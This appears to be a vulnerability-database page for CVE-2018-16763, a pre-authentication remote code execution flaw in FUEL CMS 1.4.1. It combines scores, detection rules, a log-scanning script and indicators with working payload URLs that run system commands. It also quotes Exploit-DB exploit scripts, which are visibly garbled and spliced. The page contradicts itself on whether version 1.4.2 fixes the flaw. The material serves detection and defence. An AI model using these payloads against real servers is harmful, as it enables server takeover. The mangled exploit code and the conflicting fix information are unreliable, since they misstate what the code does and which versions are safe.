CVE-2018-16763
Published: 2018-09-09
Priority: P191 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 82.94% (99.6th percentile)
FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thedaylightstudio | fuel_cms | <= 1.4.2 | — |
Detection & IOCs (extracted from sources)
url: /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
url: /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27
snort:
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Fuel CMS 1.4.1 RCE (CVE-2018-16763)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/fuel/pages/select/"; fast_pattern; content:"filter=|27 2b|"; content:"|2b 27|"; distance:0; reference:url,github.com/daylightstudio/FUEL-CMS/issues/478; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2018-16763; classtype:attempted-admin; sid:2036748; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2018_16763, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
bytes: filter=|27 2b| ... |2b 27|
- Exploit targets GET requests to /fuel/pages/select/ with a `filter` parameter containing URL-encoded PHP code injection using pi(print(...)) pattern. Look for `filter=` followed by percent-encoded single-quotes and `pi(` or `system` strings.
- The attack is Pre-Auth (no authentication required). Any GET to /fuel/pages/select/?filter= with encoded PHP eval payload should be treated as an exploitation attempt regardless of session state.
- Shodan/FOFA fingerprinting queries used by attackers to discover targets: search for HTTP title 'fuel cms' or page title 'fuel cms'.
- The exploit also abuses the preview/ data parameter as an alternative injection point. Monitor POST/GET requests to /fuel/preview/ with a `data` parameter containing PHP code.
- Exploit traffic uses a local proxy on 127.0.0.1:8080 in some variants; however the key network indicator is the URI pattern, not the proxy.
- The Nuclei template uses a benign test command (cat /etc/passwd) and matches on 'root:.*:0:0:' in the response to confirm RCE. Production detection rules should not rely solely on response content matching, as attackers will use different commands.
- The Snort rule (ET sid:2036748 rev:2) matches on the URL-encoded single-quote byte sequence |27 2b| in the filter parameter. Attackers may vary encoding (e.g., double-encoding or alternate representations) to evade this specific byte pattern.
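The encoding caveat above can be handled in log review by decoding the request target until it stops changing before matching. The following is an added example, not code from any of the sources aggregated on this page; the function names, the decode bound, the quote-then-call heuristic and the sample log lines are assumptions made for illustration, and it covers only the `filter` parameter.

```python
import re
from urllib.parse import unquote, urlsplit

MAX_ROUNDS = 5  # assumption: upper bound on nested percent-encoding layers
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Heuristic (broader than the ET rule): a quote that closes the string, then a call.
BREAKOUT = re.compile(r"'.*\(", re.S)

def fully_decode(value):
    """Percent-decode until stable so %2527 -> %27 -> ' is seen as a quote."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_fuel_filter_injection(target):
    """True if a request target hits pages/select/ with code in `filter`."""
    parts = urlsplit(target)
    if "/fuel/pages/select" not in fully_decode(parts.path).lower():
        return False
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if fully_decode(name).lower() == "filter" and BREAKOUT.search(fully_decode(raw)):
            return True
    return False

def scan(log_lines):
    """Return the indexes of access-log lines that should raise an alert."""
    hits = []
    for i, line in enumerate(log_lines):
        m = REQUEST.search(line)
        if m and is_fuel_filter_injection(m.group(1)):
            hits.append(i)
    return hits

# Constructed sample log; PAGE_URI is the indicator quoted on this page.
PAGE_URI = ("/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))"
            "%2b%24a(%27cat%20/etc/passwd%27)%2b%27")
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:00:00:01 +0000] "GET {PAGE_URI} HTTP/1.1" 200 512',
    f'192.0.2.11 - - [01/Jan/2024:00:00:02 +0000] "GET {PAGE_URI.replace("%", "%25")} HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2024:00:00:03 +0000] "GET /fuel/pages/select/?filter=news HTTP/1.1" 200 512',
    '192.0.2.13 - - [01/Jan/2024:00:00:04 +0000] "GET /blog/?filter=%27%2bx( HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The heuristic can flag legitimate filter values that contain both an apostrophe and a parenthesis, so treat hits as leads to triage alongside the signature alert.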
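CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |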
GHSA
GHSA-rq3x-g9v8-6qjm: FUEL CMS 1
ghsa_unreviewed·2022-05-13
CVE-2018-16763 [CRITICAL] CWE-74 GHSA-rq3x-g9v8-6qjm: FUEL CMS 1
VulnCheck
thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-16763 [CRITICAL] thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Affected: thedaylightstudio Fuel CMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2018-16763; https://dashboard.sh
Suricata
ET EXPLOIT Fuel CMS 1.4.1 RCE (CVE-2018-16763)
suricata·2022-06-02·CVSS 9.8
CVE-2018-16763 [CRITICAL] ET EXPLOIT Fuel CMS 1.4.1 RCE (CVE-2018-16763)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Fuel CMS 1.4.1 RCE (CVE-2018-16763)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/fuel/pages/select/"; fast_pattern; content:"filter=|27 2b|"; content:"|2b 27|"; distance:0; reference:url,github.com/daylightstudio/FUEL-CMS/issues/478; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2018-16763; classtype:attempted-admin; sid:2036748; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2018_16763, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23
Exploit-DB
Fuel CMS 1.4.1 - Remote Code Execution (3)
exploitdb·2021-11-03·CVSS 9.8
CVE-2018-16763 [CRITICAL] Fuel CMS 1.4.1 - Remote Code Execution (3)
---
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: ',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
args = parser.parse_args()
if len(sys.argv)
output = r.text.split('')
print(output[0])
if cmd == "exit":
break
Exploit-DB
Fuel CMS 1.4.1 - Remote Code Execution (2)
exploitdb·2021-01-28·CVSS 9.8
CVE-2018-16763 [CRITICAL] Fuel CMS 1.4.1 - Remote Code Execution (2)
---
# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-11-14
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version:
#{__FILE__} -h | --help
Options:
Root URL (base path) including HTTP scheme, port and root folder
The system command to execute
-h, --help Show this screen
Examples:
#{__FILE__} http://example.org id
#{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
DOCOPT
def exploit(client, root_url, cmd)
url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
res = client.get(url)
/system(.+?)'], args[''])
rescue Docopt::Exit => e
puts e.message
end
Exploit-DB
fuel CMS 1.4.1 - Remote Code Execution (1)
exploitdb·2019-07-19·CVSS 9.8
CVE-2018-16763 [CRITICAL] fuel CMS 1.4.1 - Remote Code Execution (1)
---
# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: = 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
proxy = {"http":"http://127.0.0.1:8080"}
r = requests.get(burp0_url, proxies=proxy)
html = ""
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
print r.text[0:dup]
Nuclei
FUEL CMS 1.4.1 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-16763 [CRITICAL] FUEL CMS 1.4.1 - Remote Code Execution
FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
Template:
id: CVE-2018-16763
info:
  name: FUEL CMS 1.4.1 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server.
  remediation: |
    Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47138
    - https://www.getfuelcms.com/
http://packetstormsecurity.com/files/153696/fuelCMS-1.4.1-Remote-Code-Execution.html
http://packetstormsecurity.com/files/160080/Fuel-CMS-1.4-Remote-Code-Execution.html
http://packetstormsecurity.com/files/164756/Fuel-CMS-1.4.1-Remote-Code-Execution.html
https://0xd0ff9.wordpress.com/2019/07/19/from-code-evaluation-to-pre-auth-remote-code-execution-cve-2018-16763-bypass/
https://github.com/daylightstudio/FUEL-CMS/issues/478
https://www.exploit-db.com/exploits/47138